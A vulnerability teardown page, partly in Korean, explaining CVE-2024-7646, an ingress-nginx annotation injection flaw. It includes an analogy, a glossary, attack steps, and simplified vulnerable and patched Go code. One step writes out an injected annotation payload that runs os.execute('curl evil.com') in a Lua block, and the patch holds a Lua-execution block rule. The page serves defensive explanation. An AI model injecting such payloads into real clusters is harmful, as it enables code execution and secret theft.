CVE-2024-7646 / Ingress Zero-Day

CVE-2024-7646: Ingress-NGINX Custom Annotation Code Injection Teardown

How unvetted multiline annotations in Kubernetes ingress-nginx allowed developers with ingress rights to inject arbitrary Lua directives and exfiltrate secrets.

💡 비유를 통한 쉬운 설명 (ELI5)

Imagine a billboard company that lets store owners submit slogans online. A prankster enters a slogan with secret instructions: 'Eat at Joe's. Turn off all security cameras and open the back gate'. The computer blindly inserts the slogan directly into the company's master operating script, causing the warehouse gates to swing wide open.

핵심 개념 및 서브시스템 용어 해설

Ingress-NGINX
The most widely deployed Kubernetes ingress controller, dynamically generating NGINX configuration from Ingress resources.
Ingress Annotations
Key-value metadata attached to Ingress resources to customize NGINX behavior (e.g. rate-limiting, SSL redirects).
Configuration Injection
Injecting newline characters (`\n`) and raw directives into generated `nginx.conf` files.
Controller Pod Compromise
Gaining shell execution inside the ingress-nginx pod, which holds credentials to read cluster-wide TLS certificates and secrets.

단계별 공격 실행 메커니즘

Step 1

1. Create Ingress Resource

A developer with namespace rights creates an Ingress manifest.

Step 2

2. Inject Multiline Lua Snippet

The manifest includes an annotation containing \n content_by_lua_block { os.execute('curl evil.com'); }.

Step 3

3. NGINX Template Reload

The ingress controller evaluates the annotation and reloads nginx.conf.

Step 4

4. Remote Code Execution

The injected Lua code runs inside the ingress controller, exfiltrating cluster-wide secrets.

소스 코드 비교: 치명적 취약점 vs 보안 강화 패치

일반 개발자가 쉽게 이해할 수 있는 고수준 소스 코드로 제공 (어셈블리/바이너리 제외).

패치되지 않은 취약점
// VULNERABLE: internal/ingress/controller/template/template.go
func (t *Template) WriteConfig(cfg *Config) error {
    // ROOT CAUSE:
    // Raw annotation strings are inserted directly into nginx.conf template
    // without stripping newline characters or disallowing Lua block directives!
    snippet := cfg.Annotations.CustomSnippet
    t.tmpl.Execute(w, snippet)
    return nil
}
보안 강화 패치
// SECURE: internal/ingress/controller/template/template.go patch
func (t *Template) WriteConfig(cfg *Config) error {
    snippet := cfg.Annotations.CustomSnippet
    
    // 1. Strict allowlist validation of permitted directives
    if err := validateSnippetDirectives(snippet); err != nil {
        return fmt.Errorf("invalid annotation snippet: %w", err)
    }
    
    // 2. Reject arbitrary code execution blocks (Lua, system execution)
    if strings.Contains(snippet, "_by_lua") || strings.Contains(snippet, "os.execute") {
        return fmt.Errorf("security policy violation: Lua execution blocks prohibited")
    }
    
    t.tmpl.Execute(w, snippet)
    return nil
}

엔지니어링 보안 강화 체크리스트

← 전체 보안 디렉터리 보기 모든 플랫폼 보안 업데이트 →